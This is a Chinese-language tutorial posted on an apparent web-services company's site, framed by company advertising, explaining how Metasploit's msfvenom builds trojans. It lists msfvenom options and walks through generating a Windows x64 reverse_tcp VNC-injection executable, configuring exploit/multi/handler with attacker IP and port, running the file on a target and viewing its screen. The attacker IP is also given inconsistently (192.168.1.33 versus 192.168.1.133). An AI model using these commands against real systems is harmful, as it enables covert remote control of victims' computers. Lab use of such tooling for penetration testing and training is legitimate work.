重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
Metasploit中木马生成的原理是什么,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
创新互联专注为客户提供全方位的互联网综合服务,包含不限于成都网站设计、做网站、宕昌网络推广、成都小程序开发、宕昌网络营销、宕昌企业策划、宕昌品牌公关、搜索引擎seo、人物专访、企业宣传片、企业代运营等,从售前售中售后,我们都将竭诚为您服务,您的肯定,是我们最大的嘉奖;创新互联为所有大学生创业者提供宕昌建站搭建服务,24小时服务热线:028-86922220,官方网址:www.cdcxhl.com
一、生成方式:利用msf模块中的msfvenom模块
二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
三、msfvenom命令行选项如下
-p, --payload
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled
-f, --format
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch
--platform
-s, --space
-b, --bad-chars 设定规避字符集,比如: '\x00\xff'
-i, --iterations
-c, --add-code
-x, --template
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out
-v, --var-name
--shellest 最小化生成payload
-h, --help 查看帮助选项
--help-formats 查看msf支持的输出格式列表
四、使用方法
1、msfvenom --list platforms 显示支持的平台
2、msfvenom --list formats 显示支持的格式
3、msfvenom --list archs 显示支持的架构
4、msfvenom --list encoders 显示支持的编码器
5、生成木马
目标主机:192.168.1.129(win7 x64)
攻击机:192.168.1.33
攻击端口:12121
生成木马:msfvenom --arch x64 --platform windows -p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe
6、进入监听模块 use exploit/multi/handler
7、设置payload反弹 set payload windows/x64/vncinject/reverse_tcp
8、查看需要设置的参数:show options
9、设置攻击机ip:set lhost 192.168.1.133
10、设置攻击端口:set lport 12121
11、将生成的exe文件上传到目标主机并运行
12、run攻击
13、攻击机的监控画面
14、目标主机画面
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注创新互联行业资讯频道,感谢您对创新互联的支持。